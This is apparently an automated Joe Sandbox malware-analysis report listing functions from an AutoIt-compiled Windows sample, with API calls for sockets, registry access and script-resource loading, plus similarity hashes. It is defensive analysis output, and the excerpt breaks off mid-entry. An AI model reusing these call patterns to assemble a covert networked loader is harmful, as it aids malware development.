                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 1b8853fb85590c26afbe2202884f5fd7f07b7482f83edc1f3241e1d33d8883a5
                                              • Instruction ID: effa06be031a4eeb44927761cbe8ed6531d8c6916f0e73878d838fea29bd1273
                                              • Opcode Fuzzy Hash: 1b8853fb85590c26afbe2202884f5fd7f07b7482f83edc1f3241e1d33d8883a5
                                              • Instruction Fuzzy Hash: 03218E76604219AF9B10EFA8DC88DBB77ECEB08360B448165FA24DB260DA70EC45C764
                                              Function 00BA685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BA68B1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA68C0
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BA68F9
                                              • connect.WSOCK32(00000000,?,00000010), ref: 00BA6902
                                              • WSAGetLastError.WSOCK32 ref: 00BA690C
                                              • closesocket.WSOCK32(00000000), ref: 00BA6935
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BA694E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: aa82ed58319a0693bac90fba17a6de33b982a88fe3f9c0554cd51cf20b4ed882
                                              • Instruction ID: 0712927b40005efb3e79705d367db580854ef9a7c7d4dd44461cfed1d3ef473f
                                              • Opcode Fuzzy Hash: aa82ed58319a0693bac90fba17a6de33b982a88fe3f9c0554cd51cf20b4ed882
                                              • Instruction Fuzzy Hash: C331B5B1604108AFDB10AF64CC85FBE77EDEB49725F0480A9FD05A7291CB74AC048BA1
                                              Function 00B8E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E3A5
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E3CB
                                              • SysAllocString.OLEAUT32(00000000), ref: 00B8E3CE
                                              • SysAllocString.OLEAUT32 ref: 00B8E3EF
                                              • SysFreeString.OLEAUT32 ref: 00B8E3F8
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00B8E412
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E420
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 0716f10dc038c3b4a12237226f5cbf3552318eb24ec3600f5cdd49d5bf19826e
                                              • Instruction ID: f5079c1c00f0c9a452908c832c9d4c99b2a61ed619d9adace3d381b29a556564
                                              • Opcode Fuzzy Hash: 0716f10dc038c3b4a12237226f5cbf3552318eb24ec3600f5cdd49d5bf19826e
                                              • Instruction Fuzzy Hash: 53217435604205AFAB10BFA8DC88DAF77ECEB0D360B048565F919CB3A1DA70EC41CB64
                                              Function 00B8FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                              • API String ID: 1038674560-2734436370
                                              • Opcode ID: 6a15ccce5178f851ccccbeb535825ded75d2c7eda8bae5b02e7e0cf11a98f132
                                              • Instruction ID: c86dbf278f1c40c9f2db5035f0117285c5ecec72d619d6a53ef79e1ace746af2
                                              • Opcode Fuzzy Hash: 6a15ccce5178f851ccccbeb535825ded75d2c7eda8bae5b02e7e0cf11a98f132
                                              • Instruction Fuzzy Hash: 5E21643210015366C331BB249C02FBB73C8DF55B42F9044FAF886861B3EBA19E86C394
                                              Function 00BB7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BB7C57
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BB7C64
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BB7C6F
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BB7C7E
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BB7C8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 90d6e5dc1170851f224ed6df8483d38f40d8466389d2c3f56e89c919e4550a4c
                                              • Instruction ID: d063fe6309d9b1176ddd12dd1afca09ab8b3a9ee3cbfb7ffff68f27dcf2c9c0f
                                              • Opcode Fuzzy Hash: 90d6e5dc1170851f224ed6df8483d38f40d8466389d2c3f56e89c919e4550a4c
                                              • Instruction Fuzzy Hash: 191190B2150219BFEF159F60CC85EE77F9DEF48798F014114BA08A20A0CB72AC21DBA0
                                              Function 00B99ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B80817,?,?,00000000,00000000), ref: 00B99EE8
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B80817,?,?,00000000,00000000), ref: 00B99EFF
                                              • LoadResource.KERNEL32(?,00000000,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14), ref: 00B99F0F
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14), ref: 00B99F20
                                              • LockResource.KERNEL32(00B80817,?,?,00B80817,?,?,00000000,00000000,?,?,?,?,?,?,00B44A14,00000000), ref: 00B99F2F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: ebc8393450db6f4687dc6be38d97188bb03543525ed9f3b25be4878f08505d4a
                                              • Instruction ID: b713b74656f632ca234ef8099e68a0a1aaca177669e2fa6386fdc90ab5557325
                                              • Opcode Fuzzy Hash: ebc8393450db6f4687dc6be38d97188bb03543525ed9f3b25be4878f08505d4a
                                              • Instruction Fuzzy Hash: 92112E71240701AFEB219B69DC48F27BBBDEBC9B11F1481ACB509DA260DB71EC04C661
                                              Function 00B59D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00B59D16
                                                • Part of subcall function 00B533B7: EncodePointer.KERNEL32(00000000), ref: 00B533BA
                                                • Part of subcall function 00B533B7: __initp_misc_winsig.LIBCMT ref: 00B533D5
                                                • Part of subcall function 00B533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B5A0D0
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B5A0E4
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B5A0F7
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B5A10A
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B5A11D
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B5A130
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B5A143
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B5A156
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B5A169
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B5A17C
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B5A18F
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B5A1A2
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B5A1B5
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B5A1C8
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B5A1DB
                                                • Part of subcall function 00B533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B5A1EE
                                              • __mtinitlocks.LIBCMT ref: 00B59D1B
                                              • __mtterm.LIBCMT ref: 00B59D24
                                                • Part of subcall function 00B59D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B59D29,00B57EFD,00BECD38,00000014), ref: 00B59E86
                                                • Part of subcall function 00B59D8C: _free.LIBCMT ref: 00B59E8D
                                                • Part of subcall function 00B59D8C: DeleteCriticalSection.KERNEL32(00BF0C00,?,?,00B59D29,00B57EFD,00BECD38,00000014), ref: 00B59EAF
                                              • __calloc_crt.LIBCMT ref: 00B59D49
                                              • __initptd.LIBCMT ref: 00B59D6B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B59D72
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: 7c3f3fe2daa9bb98cc1c48af9f05f099ee27c445b8d8555161bff1a1e16e3b9f
                                              • Instruction ID: cd9ccaf0e75c53cb0df2c73698824fbdf534c4642ed31c9b439b3ad468bb94a8
                                              • Opcode Fuzzy Hash: 7c3f3fe2daa9bb98cc1c48af9f05f099ee27c445b8d8555161bff1a1e16e3b9f
                                              • Instruction Fuzzy Hash: 8BF06D32519712EAEA747B78BC0375A2AE4DB41772F2047E9FC50D60E3EF50880941A0
                                              Function 00B541B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B54282,?), ref: 00B541D3
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B541DA
                                              • EncodePointer.KERNEL32(00000000), ref: 00B541E6
                                              • DecodePointer.KERNEL32(00000001,00B54282,?), ref: 00B54203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 1f1c724434fa698169da80b9598d071092dc552087d279ceb24c5d33c7cebcc4
                                              • Instruction ID: ea0b9ad806d6ac9f23ae521e162aa036ec51933bdc98b5ac5c2780e8ff31af0c
                                              • Opcode Fuzzy Hash: 1f1c724434fa698169da80b9598d071092dc552087d279ceb24c5d33c7cebcc4
                                              • Instruction Fuzzy Hash: 43E0EDB0660741AFDB202B70DD4DF543994A758B0AF504464B901E71B0CFB55585CE04
                                              Function 00B5428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B541A8), ref: 00B542A8
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B542AF
                                              • EncodePointer.KERNEL32(00000000), ref: 00B542BA
                                              • DecodePointer.KERNEL32(00B541A8), ref: 00B542D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: f2208546c37f9fb53eb9dc86073719876f72d05a0f80a98de4e87b3d9939f501
                                              • Instruction ID: 5350928589da849ef4156543877d856457434ede658b622c21ec2d7b9f3c8343
                                              • Opcode Fuzzy Hash: f2208546c37f9fb53eb9dc86073719876f72d05a0f80a98de4e87b3d9939f501
                                              • Instruction Fuzzy Hash: E4E0B670660B01EFEB20AB60ED0DF553AE4BB48B06F5441A8F601E70B0CFB56698CA14
                                              Function 00B3218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 00B321B8
                                              • GetWindowRect.USER32(?,?), ref: 00B321F9
                                              • ScreenToClient.USER32(?,?), ref: 00B32221
                                              • GetClientRect.USER32(?,?), ref: 00B32350
                                              • GetWindowRect.USER32(?,?), ref: 00B32369
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Rect$Client$Window$Screen
                                              • String ID:
                                              • API String ID: 1296646539-0
                                              • Opcode ID: 418aa431b60d820c5ddd1ec92e86a8ec8bbdc1bacb1eb8be5a00bbdb8a4b8b2e
                                              • Instruction ID: 117860fd0be939ba4814b3126b43aea36d497ca999e1992f63b8c667d5f067e3
                                              • Opcode Fuzzy Hash: 418aa431b60d820c5ddd1ec92e86a8ec8bbdc1bacb1eb8be5a00bbdb8a4b8b2e
                                              • Instruction Fuzzy Hash: A6B13839900249DBDB10CFA8C980BEEB7F1FF08710F2485A9ED59EB254DB35A950CB64
                                              Function 00B96A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                              • Instruction ID: c65afa78f8746e05f35ff49c6573e90d6aa4cedaf4504e4bdf4889abf5472b11
                                              • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                              • Instruction Fuzzy Hash: AE617B3150065AABCF11EF64C882FBE37E8EF05308F0549E9F9595B292DB34AD45CB60
                                              Function 00BB0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB091D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB095D
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BB0980
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BB09A9
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BB09EC
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB09F9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: e0ef2df3a335d2ed1ef6b0533cd59d5437d29396d2010f584575c1be2fae4687
                                              • Instruction ID: 5f3df92bd4d45180101210d8247c2ff1d8b76164e9b8c80cd836c99f359bbd96
                                              • Opcode Fuzzy Hash: e0ef2df3a335d2ed1ef6b0533cd59d5437d29396d2010f584575c1be2fae4687
                                              • Instruction Fuzzy Hash: 9B516731618204AFD710EF68C885EBBBBE8FF88314F04499DF585872A2DB71E944CB52
                                              Function 00BB5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenu.USER32(?), ref: 00BB5E38
                                              • GetMenuItemCount.USER32(00000000), ref: 00BB5E6F
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BB5E97
                                              • GetMenuItemID.USER32(?,?), ref: 00BB5F06
                                              • GetSubMenu.USER32(?,?), ref: 00BB5F14
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BB5F65
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: b2f3b3d4b24e33f4f4fafa85fa4b09e9cfd0f0c36f337f50846b821ddeffb4bf
                                              • Instruction ID: bc846952b283043ced3898a9d5768f9408baf82010ad3429180b52d1ccb5aef7
                                              • Opcode Fuzzy Hash: b2f3b3d4b24e33f4f4fafa85fa4b09e9cfd0f0c36f337f50846b821ddeffb4bf
                                              • Instruction Fuzzy Hash: BB515935A01A15AFCB21EF64C845AFEB7F5EF48310F1044E9E811BB391CBB4AE418B91
                                              Function 00B8F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00B8F6A2
                                              • VariantClear.OLEAUT32(00000013), ref: 00B8F714
                                              • VariantClear.OLEAUT32(00000000), ref: 00B8F76F
                                              • _memmove.LIBCMT ref: 00B8F799
                                              • VariantClear.OLEAUT32(?), ref: 00B8F7E6
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B8F814
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 5437980ae5dba3193ab7a578b511c33f2dccab8b858d6badd173916a5545c8bb
                                              • Instruction ID: 7c1da4decc37b94821d0315aa916ce7ad56c36b1d4826d68bdf719abd486f6c5
                                              • Opcode Fuzzy Hash: 5437980ae5dba3193ab7a578b511c33f2dccab8b858d6badd173916a5545c8bb
                                              • Instruction Fuzzy Hash: 89514D79A0020AEFDB14DF58C884AAAB7F9FF4C354F15856AE959DB310D730E911CBA0
                                              Function 00B929B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B929FF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B92A4A
                                              • IsMenu.USER32(00000000), ref: 00B92A6A
                                              • CreatePopupMenu.USER32 ref: 00B92A9E
                                              • GetMenuItemCount.USER32(000000FF), ref: 00B92AFC
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B92B2D
                                              Memory Dump Source
